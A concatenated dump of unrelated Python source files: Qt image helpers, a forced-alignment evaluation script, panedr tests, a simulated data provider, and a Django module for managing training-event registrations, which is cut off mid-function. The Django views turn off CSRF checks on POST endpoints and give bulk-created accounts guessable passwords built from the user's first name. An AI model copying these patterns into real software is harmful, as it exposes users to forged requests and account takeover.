"""Start the timer. If `ival_sec` is not None, it should
specify the time to expiration in seconds.
"""
if ival_sec is None:
ival_sec = self.ival_sec
# QTimer set in milliseconds
ms = int(ival_sec * 1000.0)
self.timer.start(ms)
def set(self, time_sec):
self.start(ival_sec=time_sec)
def cancel(self):
"""Cancel this timer. If the timer is not running, there
is no error.
"""
try:
self.timer.stop()
except Exception:
pass
clear = cancel
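# Illustrative usage (the callback name and data value are hypothetical):
# def on_expire(timer):
#     print('timer with data %r fired' % (timer.data,))
# t = Timer(0.5, on_expire, data='refresh')
# t.start()  # fires once, roughly 0.5 s later, on the Qt event loop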
def cmap2pixmap(cmap, steps=50):
"""Convert a Ginga colormap into a QPixmap
"""
inds = numpy.linspace(0, 1, steps)
n = len(cmap.clst) - 1
tups = [ cmap.clst[int(x*n)] for x in inds ]
rgbas = [QColor(int(r * 255), int(g * 255),
int(b * 255), 255).rgba() for r, g, b in tups]
im = QImage(steps, 1, QImage.Format_Indexed8)
im.setColorTable(rgbas)
for i in range(steps):
im.setPixel(i, 0, i)
im = im.scaled(128, 32)
pm = QPixmap.fromImage(im)
return pm
def get_scroll_info(event):
"""
Returns the (degrees, direction) of a scroll motion Qt event.
"""
# 15 deg is standard 1-click turn for a wheel mouse
# delta() usually returns 120
if have_pyqt5:
# TODO: use pixelDelta() for better handling on hi-res devices
point = event.angleDelta()
dx, dy = point.x(), point.y()
delta = math.sqrt(dx ** 2 + dy ** 2)
if dy < 0:
delta = -delta
ang_rad = math.atan2(dy, dx)
direction = math.degrees(ang_rad) - 90.0
direction = math.fmod(direction + 360.0, 360.0)
else:
delta = event.delta()
orientation = event.orientation()
direction = None
if orientation == QtCore.Qt.Horizontal:
if delta > 0:
direction = 270.0
elif delta < 0:
direction = 90.0
else:
if delta > 0:
direction = 0.0
elif delta < 0:
direction = 180.0
num_degrees = abs(delta) / 8.0
return (num_degrees, direction)
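# For example, one standard wheel click up on Qt4 (delta == 120, vertical
# orientation) yields (15.0, 0.0): fifteen degrees of rotation, pointing up.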
def get_icon(iconpath, size=None):
image = QImage(iconpath)
if size is not None:
qsize = QtCore.QSize(*size)
image = image.scaled(qsize)
pixmap = QPixmap.fromImage(image)
iconw = QIcon(pixmap)
return iconw
def get_font(font_family, point_size):
font = QFont(font_family, point_size)
return font
#END
| bsd-3-clause | 8,053,044,321,151,345,000 | 25.837278 | 113 | 0.584169 | false |
meyersbs/misc_nlp_scripts | Prosodylab-Aligner-master/eval.py | 1 | 2762 | #!/usr/bin/env python3
# eval.py: intrinsic evaluation for forced alignment using Praat TextGrids
# Kyle Gorman <[email protected]>
from __future__ import division
from aligner import TextGrid
from sys import argv, stderr
from collections import namedtuple
from argparse import ArgumentParser
CLOSE_ENOUGH = 20
TIER_NAME = "phones"
boundary = namedtuple("boundary", ["transition", "time"])
def boundaries(textgrid, tier_name):
"""
Extract a single tier named `tier_name` from the TextGrid object
`textgrid`, and then convert that IntervalTier to a list of boundaries
"""
tiers = textgrid.getList(tier_name)
if not tiers:
exit('TextGrid has no "{}" tier.'.format(tier_name))
if len(tiers) > 1:
exit('TextGrid has many "{}" tiers.'.format(tier_name))
tier = tiers[0]
boundaries = []
for (interval1, interval2) in zip(tier, tier[1:]):
boundaries.append(boundary('"{}"+"{}"'.format(interval1.mark,
interval2.mark),
interval1.maxTime))
return boundaries
def is_close_enough(tx, ty, close_enough):
"""
Return True iff `tx` and `ty` are within `close_enough` of each other
"""
return abs(tx - ty) < close_enough
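# e.g. with the 20 ms default, is_close_enough(1.000, 1.015, 0.02) is True
# and is_close_enough(1.000, 1.025, 0.02) is False.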
if __name__ == "__main__":
# check args
tier_name = TIER_NAME
close_enough = CLOSE_ENOUGH / 1000
argparser = ArgumentParser(description="Alignment quality evaluation")
argparser.add_argument("-f", "--fudge", type=int,
help="Fudge factor in milliseconds")
argparser.add_argument("-t", "--tier",
help="Name of tier to use")
argparser.add_argument("OneGrid")
argparser.add_argument("TwoGrid")
args = argparser.parse_args()
if args.fudge:
close_enough = args.fudge / 1000
if args.tier:
tier_name = args.tier
# read in
first = boundaries(TextGrid.fromFile(args.OneGrid), tier_name)
secnd = boundaries(TextGrid.fromFile(args.TwoGrid), tier_name)
# count concordant and discordant boundaries
if len(first) != len(secnd):
exit("Tiers lengths do not match.")
concordant = 0
discordant = 0
for (boundary1, boundary2) in zip(first, secnd):
if boundary1.transition != boundary2.transition:
exit("Tier labels do not match.")
if is_close_enough(boundary1.time, boundary2.time, close_enough):
concordant += 1
else:
discordant += 1
# print out
agreement = concordant / (concordant + discordant)
print("{} 'close enough' boundaries.".format(concordant))
print("{} incorrect boundaries.".format(discordant))
print("Agreement: {:.4f}".format(agreement))
| mit | 5,643,734,626,767,116,000 | 32.682927 | 75 | 0.625272 | false |
jbarnoud/panedr | tests/test_edr.py | 1 | 8096 | #-*- coding: utf-8 -*-
"""
Tests for panedr
"""
from __future__ import print_function, division
import six
import os
import sys
import unittest
import pytest
import contextlib
import numpy
import pandas
import panedr
import re
# On python 2, cStringIO is a faster version of StringIO. It may not be
# available on implementations other than CPython, though. Therefore, we may
# have to fall back on StringIO if cStringIO is not available.
# On python 3, the StringIO object is not part of the StringIO module anymore.
# It becomes part of the io module.
try:
from cStringIO import StringIO
except ImportError:
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from collections import namedtuple
try:
from pathlib import Path
except ImportError:
# Python 2 requires the pathlib2 backport of pathlib
from pathlib2 import Path
# Constants for XVG parsing
COMMENT_PATTERN = re.compile(r'\s*[@#%&/]')
LEGEND_PATTERN = re.compile(r'@\s+s\d+\s+legend\s+"(.*)"')
NDEC_PATTERN = re.compile(r'[\.eE]')
# Data constants
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
EDR = os.path.join(DATA_DIR, 'cat.edr')
EDR_XVG = os.path.join(DATA_DIR, 'cat.xvg') # All EDR fields read with
# ``gmx energy``
EDR_IRREGULAR = os.path.join(DATA_DIR, 'irregular.edr')
EDR_IRREGULAR_XVG = os.path.join(DATA_DIR, 'irregular.xvg')
EDR_DOUBLE = os.path.join(DATA_DIR, 'double.edr')
EDR_DOUBLE_XVG = os.path.join(DATA_DIR, 'double.xvg')
EDR_BLOCKS = os.path.join(DATA_DIR, 'blocks.edr')
EDR_BLOCKS_XVG = os.path.join(DATA_DIR, 'blocks.xvg')
EDR_Data = namedtuple('EDR_Data', ['df', 'xvgdata', 'xvgtime', 'xvgnames',
'xvgprec', 'edrfile', 'xvgfile'])
@pytest.fixture(scope='module',
params=[(EDR, EDR_XVG),
(EDR_IRREGULAR, EDR_IRREGULAR_XVG),
(EDR_DOUBLE, EDR_DOUBLE_XVG),
(EDR_BLOCKS, EDR_BLOCKS_XVG),
(Path(EDR), EDR_XVG),
])
def edr(request):
edrfile, xvgfile = request.param
df = panedr.edr_to_df(edrfile)
xvgdata, xvgnames, xvgprec = read_xvg(xvgfile)
xvgtime = xvgdata[:, 0]
xvgdata = xvgdata[:, 1:]
return EDR_Data(df, xvgdata, xvgtime, xvgnames, xvgprec, edrfile, xvgfile)
class TestEdrToDf(object):
"""
Tests for :func:`panedr.edr_to_df`.
"""
def test_output_type(self, edr):
"""
Test that the function returns a pandas DataFrame.
"""
assert isinstance(edr.df, pandas.DataFrame)
def test_columns(self, edr):
"""
Test that the column names and order match.
"""
ref_columns = numpy.insert(edr.xvgnames, 0, u'Time')
columns = edr.df.columns.values
if columns.shape[0] == ref_columns.shape[0]:
print('These columns differ from the reference (displayed as read):')
print(columns[ref_columns != columns])
print('The corresponding names displayed as reference:')
print(ref_columns[ref_columns != columns])
assert ref_columns.shape == columns.shape, \
'The number of columns read is unexpected.'
assert numpy.all(ref_columns == columns), \
'At least one column name was misread.'
def test_times(self, edr):
"""
Test that the time is read correctly when dt is regular.
"""
time = edr.df[u'Time'].values
assert numpy.allclose(edr.xvgtime, time, atol=5e-7)
def test_content(self, edr):
"""
Test that the content of the DataFrame is the expected one.
"""
content = edr.df.iloc[:, 1:].values
print(edr.xvgdata - content)
assert numpy.allclose(edr.xvgdata, content, atol=edr.xvgprec/2)
def test_verbosity(self):
"""
Make sure the verbose mode does not alter the results.
"""
with redirect_stderr(sys.stdout):
df = panedr.edr_to_df(EDR, verbose=True)
ref_content, _, prec = read_xvg(EDR_XVG)
content = df.values
print(ref_content - content)
assert numpy.allclose(ref_content, content, atol=prec/2)
def test_progress(self):
"""
Test the progress meter displays what is expected.
"""
output = StringIO()
with redirect_stderr(output):
df = panedr.edr_to_df(EDR, verbose=True)
progress = output.getvalue().split('\n')[0].split('\r')
print(progress)
dt = 2000.0
# We can already iterate on `progress`, but I want to keep the cursor
# position from one for loop to the other.
progress_iter = iter(progress)
assert '' == next(progress_iter)
self._assert_progress_range(progress_iter, dt, 0, 21, 1)
self._assert_progress_range(progress_iter, dt, 30, 201, 10)
self._assert_progress_range(progress_iter, dt, 300, 2001, 100)
self._assert_progress_range(progress_iter, dt, 3000, 14101, 1000)
# Check the last line
print(df.iloc[-1, 0])
ref_line = 'Last Frame read : 14099, time : 28198000.0 ps'
last_line = next(progress_iter)
assert ref_line == last_line
# Did we leave stderr clean with a nice new line at the end?
assert output.getvalue().endswith('\n'), \
'New line missing at the end of output.'
def _assert_progress_range(self, progress, dt, start, stop, step):
for frame_idx in range(start, stop, step):
ref_line = 'Read frame : {}, time : {} ps'.format(frame_idx,
dt * frame_idx)
progress_line = next(progress)
print(frame_idx, progress_line)
assert ref_line == progress_line
def read_xvg(path):
"""
Reads XVG file, returning the data, names, and precision.
The data is returned as a 2D numpy array. Column names are returned as an
array of string objects. Precision is returned as a float, 10**(-d), where d
is the least number of decimal places found, excluding the first (time) column.
The XVG file type is assumed to be 'xy' or 'nxy'. The function also assumes
that there is only one series in the file (no data after // if // is
present). If more than one series is present, they will be concatenated if
the number of columns is consistent; if the number of columns is not
consistent among the series, the function will crash.
"""
data = []
names = []
prec = -1
with open(path) as infile:
for line in infile:
if not re.match(COMMENT_PATTERN, line):
data.append(line.split())
precs = [ndec(val) for val in data[-1][1:]]
if prec == -1:
prec = min(precs)
else:
prec = min(prec, *precs)
continue
match = re.match(LEGEND_PATTERN, line)
if match:
names.append(six.text_type(match.groups()[0]))
if prec <= 0:
prec = 1.
else:
prec = 10**(-prec)
return (numpy.array(data, dtype=float),
numpy.array(names, dtype=object),
prec)
def ndec(val):
"""Returns the number of decimal places of a string rep of a float
"""
try:
return len(re.split(NDEC_PATTERN, val)[1])
except IndexError:
return 0
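# For example: ndec('1.250') == 3, ndec('1e-3') == 2 (the length of the part
# after the split point), and ndec('42') == 0.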
@contextlib.contextmanager
def redirect_stderr(target):
"""
Redirect sys.stderr to an other object.
This function is intended to be used as a context manager. It is especially
useful to redirect stderr to stdout, as stdout gets captured by nose
while stderr is not. stderr can also be redirected to any other object
that may act on it, such as a StringIO to inspect its content.
"""
stderr = sys.stderr
try:
sys.stderr = target
yield
finally:
sys.stderr = stderr
if __name__ == '__main__':
unittest.main()
| lgpl-2.1 | 5,920,553,386,538,837,000 | 33.451064 | 81 | 0.600173 | false |
whereaswhile/DLSR | common/SimPrvd.py | 1 | 2133 | #simulated regression data provider
import os
import sys
import numpy as np
import scipy.misc
import glob
sys.path.append("../convnet-folk_master")
from w_util import readLines
# define default parameters
IN_DATA_SIZE=[5, 5, 1]
OUT_DATA_SIZE=[16, 1]
DATA_NUM=1
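# The parameter file is parsed as one "key value" pair per line; a hypothetical
# example selecting a filter file instead of the default 'avg' filter:
#   filtype my_filter.fil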
class SimSet:
def __init__(self, paramfile):
print "SimPrvd: parsing", paramfile
plines = readLines(paramfile)
self.param = {'paramfile': paramfile, 'filtype': 'avg'}
for l in plines:
l=l.rstrip().split()
self.param[l[0]]=l[1]
print self.param
self.indim=1
for s in IN_DATA_SIZE:
self.indim*=s
self.outdim=1
for s in OUT_DATA_SIZE:
self.outdim*=s
# draw data
self.input=[]
self.output=[]
if self.param['filtype'][-4:]=='.fil': #load filter from file
fil=np.loadtxt(self.param['filtype'])
fil=np.reshape(fil, IN_DATA_SIZE)
for i in range(DATA_NUM):
if DATA_NUM==1:
m=np.ones(IN_DATA_SIZE)
else:
m=np.random.random(IN_DATA_SIZE) #random
self.input+=[m]
mm=np.zeros(OUT_DATA_SIZE)
if self.param['filtype']=='avg':
mm[0, 0]=np.mean(m)
else:
mm[0, 0]=np.sum(m*fil)
self.output+=[mm]
def get_num_images(self):
return DATA_NUM
#def get_num_classes(self):
# return 0
def get_input_dim(self):
return self.indim
def get_output_dim(self):
return self.outdim
def get_input(self, idx):
return self.input[idx]
def get_output(self, idx):
return self.output[idx]
def getmeta(self, idx):
return self.param
def getStore(param):
return SimSet(param)
def test(param):
ts = SimSet(param)
print "{} images, {} classes".format(ts.get_num_images(), ts.get_num_classes())
for i in range(0,20,10):
im=ts.get_input(i)
y=ts.get_output(i)
meta=ts.getmeta(i)
print "i={}, input={},\toutput={}".format(i, im, y)
print 'image shape:', np.shape(im)
print 'meta', meta
if __name__ == '__main__':
print 'testing SimPrvd.py!'
assert(len(sys.argv)==2)
test(sys.argv[1])
| gpl-2.0 | 8,928,693,029,719,009,000 | 21.452632 | 83 | 0.592124 | false |
Spoken-tutorial/spoken-website | training/views.py | 1 | 37970 | # Django imports
from django.shortcuts import render, redirect
from django.views.generic import View, ListView
from django.views.generic.edit import CreateView, UpdateView, DeleteView, FormView
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import csrf_protect, csrf_exempt
from django.core.exceptions import PermissionDenied
from django.contrib import messages
from django.http import HttpResponse, HttpResponseRedirect
from django.core.serializers import serialize
from django.db.models import Q, Sum
from django.contrib.auth.models import User
from django.urls import reverse
# Python imports
from datetime import datetime, date, timedelta
import csv
import json
import random
import uuid
# Spoken imports
from .models import *
from .forms import *
from .helpers import *
from .templatetags.trainingdata import registartion_successful, get_event_details, get_user_detail
from creation.models import TutorialResource, Language, FossCategory
from events.decorators import group_required
from events.models import *
from events.views import is_resource_person, is_administrator, get_page, id_generator
from events.filters import ViewEventFilter, PaymentTransFilter, TrEventFilter
from cms.sortable import *
from cms.views import create_profile, send_registration_confirmation
from cms.models import Profile
from certificate.views import _clean_certificate_certificate
import os, sys
from string import Template
import subprocess
# PDF generation
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter, landscape
from reportlab.platypus import Paragraph
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.units import cm
from reportlab.lib.enums import TA_CENTER
from PyPDF2 import PdfFileWriter, PdfFileReader
from io import BytesIO
from django.conf import settings
from donate.models import *
import csv
today = date.today()
class TrainingEventCreateView(CreateView):
form_class = CreateTrainingEventForm
model = TrainingEvents
template_name = "create_event.html"
success_url = "/software-training/"
@method_decorator(group_required("Resource Person"))
def get(self, request, *args, **kwargs):
return render(self.request, self.template_name, {'form': self.form_class()})
def form_valid(self, form, **kwargs):
self.object = form.save(commit=False)
self.object.entry_user = self.request.user
self.object.Language_of_workshop = Language.objects.get(id=22)
self.object.save()
messages.success(self.request, "New Event created successfully.")
return HttpResponseRedirect(self.success_url)
#ILW main page
class TrainingEventsListView(ListView):
model = TrainingEvents
raw_get_data = None
header = None
collection = None
def dispatch(self, *args, **kwargs):
self.status = self.kwargs['status']
today = date.today()
self.show_myevents = False
if self.request.user:
myevents = TrainingEvents.objects.filter(id__in=Participant.objects.filter(user_id=self.request.user.id).values('event_id'))
if myevents:
self.show_myevents = True
if self.status == 'completed':
self.events = TrainingEvents.objects.filter(event_end_date__lt=today)
if self.status == 'ongoing':
self.events = TrainingEvents.objects.filter(event_end_date__gte=today)
if self.status == 'myevents':
participant = Participant.objects.filter(
Q(payment_status__status=1)|Q(registartion_type__in=(1,3)),
user_id=self.request.user.id)
self.events = participant
self.raw_get_data = self.request.GET.get('o', None)
self.queryset = get_sorted_list(
self.request,
self.events,
self.header,
self.raw_get_data
)
self.collection= ViewEventFilter(self.request.GET, queryset=self.queryset, user=self.request.user)
return super(TrainingEventsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(TrainingEventsListView, self).get_context_data(**kwargs)
context['form'] = self.collection.form
page = self.request.GET.get('page')
collection = get_page(self.collection.qs, page)
context['collection'] = collection
context['ordering'] = get_field_index(self.raw_get_data)
context['status'] = self.status
context['events'] = self.events
context['show_myevents'] = self.show_myevents
context['ILW_ONLINE_TEST_URL'] = settings.ILW_ONLINE_TEST_URL
if self.request.user:
context['user'] = self.request.user
return context
@csrf_exempt
def register_user(request):
form = RegisterUser()
template_name = "register_user.html"
context = {}
context['form']= form
if request.user.is_authenticated():
user = request.user
profile = Profile.objects.get(user=user)
form.fields["name"].initial = user.get_full_name()
form.fields["email"].initial = getattr(user, 'email')
form.fields["phone"].initial = profile.phone
form.fields['email'].widget.attrs['readonly'] = True
if user.profile_set.all():
try:
form.fields["state"].initial = getattr(user.profile_set.all()[0], 'state')
college = user_college(request.user)
context['user_college'] = college
except Exception as e:
raise e
if request.method == 'POST':
event_id = request.POST.get("event_id_info")
if event_id:
event_register = TrainingEvents.objects.get(id=event_id)
langs = Language.objects.filter(id__in =
TutorialResource.objects.filter(
tutorial_detail__foss = event_register.foss, status=1).exclude(
language=event_register.Language_of_workshop).values('language').distinct())
context["langs"] = langs
form.fields["foss_language"].queryset = langs
gst = float(event_register.event_fee)* 0.18
context["gst"] = gst
form.fields["amount"].initial = float(event_register.event_fee) + gst
form.fields["amount"].widget.attrs['readonly'] = True
context['event_obj']= event_register
return render(request, template_name,context)
@csrf_exempt
def reg_success(request, user_type):
context = {}
template_name = "reg_success.html"
if request.method == 'POST':
name = request.POST.get('name')
email = request.POST.get('email')
phone = request.POST.get('phone')
event_obj = request.POST.get('event')
event = TrainingEvents.objects.get(id=event_obj)
form = RegisterUser(request.POST)
if form.is_valid():
form_data = form.save(commit=False)
form_data.user = request.user
form_data.event = event
try:
form_data.college = AcademicCenter.objects.get(institution_name=request.POST.get('college'))
except:
form_data.college = AcademicCenter.objects.get(id=request.POST.get('dropdown_college'))
user_data = is_user_paid(request.user, form_data.college.id)
if user_data[0]:
form_data.registartion_type = 1 #Subscribed College
else:
form_data.registartion_type = 2 #Manual reg- paid 500
part = Participant.objects.filter(
Q(payment_status__status = 1)|Q(registartion_type__in = (1,3)),
user = request.user, event = form_data.event)
if part.exists():
messages.success(request, "You have already registered for this event.")
return redirect('training:list_events', status='myevents')
else :
form_data.save()
event_name = event.event_name
userprofile = Profile.objects.get(user=request.user)
userprofile.phone = phone
userprofile.save()
if user_type == 'paid':
context = {'participant_obj':form_data}
return render(request, template_name, context)
else:
return form_data
else:
messages.warning(request, 'Invalid form payment request.')
return redirect('training:list_events', status='ongoing' )
class EventPraticipantsListView(ListView):
model = Participant
@method_decorator(group_required("Resource Person"))
def dispatch(self, *args, **kwargs):
self.eventid = self.kwargs['eventid']
self.queryset = Participant.objects.filter(event_id=self.eventid)
self.event = TrainingEvents.objects.get(id=self.eventid)
today = date.today()
self.training_status = 0 #ongoing
if self.event.event_end_date < today:
self.training_status = 1 #completed
return super(EventPraticipantsListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventPraticipantsListView, self).get_context_data(**kwargs)
context['training_status']= self.training_status
context['eventid']= self.eventid
context['event']= self.event
return context
class EventUpdateView(UpdateView):
model = TrainingEvents
form_class = CreateTrainingEventForm
success_url = "/training/event/rp/ongoing/"
# Used to display events to training managers under the dashboard link
def listevents(request, role, status):
context = {}
user = request.user
if not (user.is_authenticated() and (is_resource_person(user) or is_administrator(user))):
raise PermissionDenied()
if (not role ) or (not status):
raise PermissionDenied()
states = State.objects.filter(resourceperson__user_id=user, resourceperson__status=1)
TrMngerEvents = TrainingEvents.objects.filter(state__in=states).order_by('-event_start_date')
status_list = {'ongoing': 0, 'completed': 1, 'closed': 2, 'expired': 3}
roles = ['rp', 'em']
if role in roles and status in status_list:
if status == 'ongoing':
queryset = TrMngerEvents.filter(training_status__lte=1, event_end_date__gte=today)
elif status == 'completed':
queryset =TrMngerEvents.filter(training_status=1, event_end_date__lt=today)
elif status == 'closed':
queryset = TrMngerEvents.filter(training_status=2)
elif status == 'expired':
queryset = TrMngerEvents.filter(training_status=0, event_end_date__lt=today)
header = {
1: SortableHeader('#', False),
2: SortableHeader(
'state__name',
True,
'State'
),
3: SortableHeader(
'host_college__academic_code',
True,
'Code'
),
4: SortableHeader(
'host_college__institution_name',
True,
'Institution'
),
5: SortableHeader('foss__foss', True, 'Foss Name'),
6: SortableHeader(
'event_coordinator_name',
True,
'Coordinator'
),
7: SortableHeader(
'registartion_end_date',
True,
'Registration Period'
),
8: SortableHeader(
'event_start_date',
True,
'Event Start Date'
),
9: SortableHeader(
'event_end_date',
True,
'Event End Date'
),
10: SortableHeader('Participant Count', True),
11: SortableHeader('Action', False)
}
event_type = request.GET.get('event_type', None)
pcount, mcount, fcount = get_all_events_detail(queryset, event_type) if event_type else get_all_events_detail(queryset)
raw_get_data = request.GET.get('o', None)
queryset = get_sorted_list(
request,
queryset,
header,
raw_get_data
)
collection= TrEventFilter(request.GET, queryset=queryset, user=user)
else:
raise PermissionDenied()
context['form'] = collection.form
page = request.GET.get('page')
collection = get_page(collection.qs, page)
context['collection'] = collection
context['role'] = role
context['status'] = status
context['header'] = header
context['today'] = today
context['ordering'] = get_field_index(raw_get_data)
context['pcount'] = pcount
context['mcount'] = mcount
context['fcount'] = fcount
return render(request,'event_status_list.html',context)
def close_event(request, pk):
context = {}
user = request.user
if not (user.is_authenticated() and is_resource_person(user)):
raise PermissionDenied()
event = TrainingEvents.objects.get(id=pk)
if event:
event.training_status = 2 #close event
event.save()
messages.success(request, 'Event has been closed successfully')
else:
messages.error(request, 'Request not sent.Please try again.')
return HttpResponseRedirect("/training/event/rp/completed/")
def approve_event_registration(request, pk):
context = {}
user = request.user
if not (user.is_authenticated() and is_resource_person(user)):
raise PermissionDenied()
event = TrainingEvents.objects.get(id=pk)
if event:
event.training_status = 1 #approve registraions
event.save()
messages.success(request, 'Registrations approved successfully')
else:
messages.error(request, 'Request not sent.Please try again.')
return HttpResponseRedirect("/training/event/rp/ongoing/")
class ParticipantCreateView(CreateView):
form_class = UploadParticipantsForm
@method_decorator(group_required("Resource Person"))
def dispatch(self, *args, **kwargs):
if 'eventid' in kwargs:
try:
self.event = TrainingEvents.objects.get(pk=kwargs['eventid'])
except:
messages.error(self.request, 'Event not found')
return HttpResponseRedirect(reverse("training:create_event"))
if not self.event.training_status == 0:
messages.error(self.request, 'Upload via CSV is not allowed as Event registration is closed')
return super(ParticipantCreateView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ParticipantCreateView, self).get_context_data(**kwargs)
context['event']= self.event
return context
def form_valid(self, form):
count = 0
csv_file_data = form.cleaned_data['csv_file']
registartion_type = form.cleaned_data['registartion_type']
if registartion_type == 2:
# 3 - Manual registration via CSV (option not visible outside)
registartion_type = 3
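# Expected CSV column layout, inferred from the row indices used below
# (column 5 appears unused):
# 0: first name, 1: last name, 2: email, 3: gender, 4: amount,
# 6: institution academic code, 7: FOSS language name, 8: phone (profile)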
rows_data = csv.reader(csv_file_data, delimiter=',', quotechar='|')
csv_error = False
for i, row in enumerate(rows_data):
user = self.get_create_user(row)
try:
college = AcademicCenter.objects.get(academic_code=row[6])
except AcademicCenter.DoesNotExist:
csv_error = True
messages.add_message(self.request, messages.ERROR, "Row: "+ str(i+1) + " Institution name " + row[6] + " does not exist."+" Participant "+ row[2] + " was not created.")
continue
if registartion_type == 1:
if not(is_college_paid(college.id)):
messages.add_message(self.request, messages.ERROR, "Row: "+ str(i+1) + " Institution " + row[6] + " is not a Paid college."+" Participant "+ row[2] + " was not created.")
continue
try:
foss_language = Language.objects.get(name=row[7].strip())
except :
messages.add_message(self.request, messages.ERROR, "Row: "+ str(i+1) + " Language name " + row[7] + " does not exist."+" Participant "+ row[2] + " was not created.")
continue
participant = Participant.objects.filter(email=row[2].strip(),event = self.event)
if participant.exists() and registartion_successful(user, self.event):
messages.add_message(self.request, messages.WARNING, "Participant with email "+row[2]+" already registered for "+self.event.event_name)
continue
else:
try:
Participant.objects.create(
name = row[0]+" "+row[1],
email = row[2].strip(),
gender = row[3],
amount = row[4],
event = self.event,
user = user,
state = college.state,
college = college,
foss_language = foss_language,
registartion_type = registartion_type,
reg_approval_status = 1
)
count = count + 1
except :
csv_error = True
messages.add_message(self.request, messages.ERROR, "Could not create participant having email id" + row[2])
if csv_error:
messages.warning(self.request, 'Some rows in the csv file has errors and are not created.')
if count > 0:
messages.success(self.request, 'Successfully uploaded '+str(count)+" participants")
return HttpResponseRedirect(reverse("training:upload_participants", kwargs={'eventid': self.event.pk}))
def get_create_user(self, row):
try:
return User.objects.get(email=row[2].strip())
except User.DoesNotExist:
user = User(username=row[2], email=row[2].strip(), first_name=row[0], last_name=row[1])
user.set_password(row[0]+'@ST'+str(random.random()).split('.')[1][:5])
user.save()
create_profile(user, row[8].strip())
send_registration_confirmation(user)
return user
def mark_reg_approval(pid, eventid):
participant = Participant.objects.get(event_id =eventid, id=pid)
participant.reg_approval_status = 1
participant.save()
class EventAttendanceListView(ListView):
queryset = ""
unsuccessful_payee = ""
paginate_by = 500
success_url = ""
def dispatch(self, *args, **kwargs):
self.event = TrainingEvents.objects.get(pk=kwargs['eventid'])
main_query = Participant.objects.filter(event_id=kwargs['eventid'])
self.queryset = main_query.filter(Q(payment_status__status=1)| Q(registartion_type__in=(1,3)))
self.unsuccessful_payee = main_query.filter(payment_status__status__in=(0,2))
if self.event.training_status == 1:
self.queryset = main_query.filter(reg_approval_status=1)
if self.event.training_status == 2:
self.queryset = self.event.eventattendance_set.all()
return super(EventAttendanceListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(EventAttendanceListView, self).get_context_data(**kwargs)
context['event'] = self.event
context['eventid'] = self.event.id
context['unsuccessful_payee'] = self.unsuccessful_payee
return context
def post(self, request, *args, **kwargs):
self.object = None
self.user = request.user
eventid = kwargs['eventid']
attendance_type = request.POST.get('event_status', None)
if attendance_type == 'attend':
if request.POST and 'user' in request.POST:
marked_participant = request.POST.getlist('user', None)
# delete unmarked attendance records if they exist
EventAttendance.objects.filter(event_id =eventid).exclude(participant_id__in = marked_participant).delete()
# insert a new record if one does not exist
for record in marked_participant:
event_attend = EventAttendance.objects.filter(event_id =eventid, participant_id = record)
if not event_attend.exists():
EventAttendance.objects.create(event_id =eventid, participant_id = record)
#print marked_participant
success_url = '/training/event/rp/completed'
else:
EventAttendance.objects.filter(event_id = eventid).delete()
success_url = '/training/event/rp/completed'
elif attendance_type == 'reg':
if request.POST and 'user_reg' in request.POST:
marked_registrations = request.POST.getlist('user_reg', None)
# delete unmarked registration records if they exist
remove_reg = Participant.objects.filter(event_id =eventid, reg_approval_status=1).exclude(id__in = marked_registrations).update(reg_approval_status=0)
# insert a new record if one does not exist
for record in marked_registrations:
reg_attend = Participant.objects.filter(event_id =eventid, id = record, reg_approval_status=1)
if not reg_attend.exists():
mark_reg_approval(record, eventid)
#print marked_registrations
success_url = '/training/event/rp/ongoing'
else:
Participant.objects.filter(event_id =eventid).update(reg_approval_status=0)
success_url = '/training/event/rp/ongoing'
return HttpResponseRedirect(success_url)
@csrf_exempt
def ajax_check_college(request):
college_id = request.POST.get("college_id")
user_details = is_user_paid(request.user, int(college_id))
check = False
if user_details[0]:
check = True
return HttpResponse(json.dumps(check), content_type='application/json')
def get_create_user(row):
try:
return User.objects.get(email=row[2].strip())
except User.DoesNotExist:
user = User(username=row[2], email=row[2].strip(), first_name=row[0], last_name=row[1])
user.set_password(row[0]+'@ST'+str(random.random()).split('.')[1][:5])
user.save()
create_profile(user, '')
send_registration_confirmation(user)
return user
from io import TextIOWrapper
from django.contrib.auth.decorators import login_required
@login_required
def upload_college_details(request):
form = UploadCollegeForm
context ={}
context['form'] = form
count = 0
csv_error = ''
if request.POST:
csv_file_data = TextIOWrapper(request.FILES['csv_file'], encoding='utf-8')
rows_data = csv.reader(csv_file_data, delimiter=',')
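# Column layout inferred from the indices used in the loop below:
# 1: state, 2: academic code, 3: payer name, 4: email, 5: phone, 6: amount,
# 7: subscription text, 8: transaction id, 9: payment date (dd/mm/yyyy),
# 10: payment status, 11: college type, 12: PAN, 13: GST, 14: customer id,
# 15: invoice no, 16: remarks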
for i, row in enumerate(rows_data):
user = get_create_user(row)
try:
college = AcademicCenter.objects.get(academic_code=row[2])
except AcademicCenter.DoesNotExist:
csv_error = True
messages.add_message(request, messages.ERROR, "Row: "+ str(i+1) + " College" + row[2] + " does not exist.")
continue
try:
state = State.objects.get(name=row[1])
except State.DoesNotExist:
csv_error = True
messages.add_message(request, messages.ERROR, "Row: "+ str(i+1) + " State " + row[1] + " does not exist."+" College "+ row[2] + " was not added.")
continue
subscription = ''
payment_status = ''
college_type = ''
if '1 year' in row[7]:
subscription = '365'
if '6 months' in row[7]:
subscription = '180'
if row[11] == 'Engineering':
college_type = 'Engg'
day,mon,year = row[9].split('/')
payment_date = datetime(year=int(year), month=int(mon), day=int(day))
try:
ac_payment_new = AcademicPaymentStatus.objects.create(
state = state,
academic = college,
name_of_the_payer = row[3],
email = row[4],
phone = row[5],
amount = row[6],
subscription = subscription,
transactionid = row[8],
payment_date = payment_date,
payment_status = row[10],
college_type = college_type,
pan_number = row[12],
gst_number = row[13],
customer_id = row[14],
invoice_no = row[15],
remarks = row[16],
entry_date = payment_date,
entry_user = request.user
)
try:
add_Academic_key(ac_payment_new, subscription)
except :
messages.add_message(request, messages.ERROR, " Academic key for " + row[2]+" already exists")
count = count + 1
except :
academic_centre = AcademicPaymentStatus.objects.filter(
academic=college, transactionid=row[8], payment_date=payment_date)  # row[8] is the transaction id; row[9] is the date
if academic_centre.exists():
